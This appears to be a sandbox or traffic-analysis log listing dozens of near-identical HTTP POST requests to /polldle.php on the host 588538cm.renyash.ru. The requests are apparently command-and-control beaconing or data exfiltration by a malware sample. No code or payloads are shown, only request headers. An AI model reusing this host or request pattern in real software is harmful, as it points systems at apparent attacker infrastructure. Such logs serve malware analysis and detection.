Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 1616 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2500 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 1616 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2500 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 2504 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /polldle.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 | Host: 588538cm.renyash.ru | Content-Length: 1608 | Expect: 100-continue | Connection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 247860Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1608Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1596Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2496Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continue
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 1620Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2504Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /polldle.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 588538cm.renyash.ruContent-Length: 2500Expect: 100-continue
